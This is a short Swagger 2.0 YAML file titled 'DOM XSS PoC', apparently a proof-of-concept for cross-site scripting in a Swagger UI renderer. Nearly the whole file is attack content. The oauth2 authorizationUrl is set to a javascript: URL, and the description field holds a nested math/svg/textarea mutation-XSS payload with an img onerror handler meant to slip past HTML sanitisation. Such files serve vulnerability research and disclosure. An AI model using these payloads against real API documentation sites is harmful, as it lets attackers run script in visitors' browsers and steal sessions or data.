swagger: '2.0'
security:
  - a: []
components:
  securitySchemes:
    a:
      type: oauth2
      authorizationUrl: 'javascript:alert(document.domain)//'
info:
  version: 1.0.0
  title: DOM XSS PoC
  description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
  termsOfService: "test"
paths:
  /:
    get:
      responses:
        '200':
          description: Echo GET
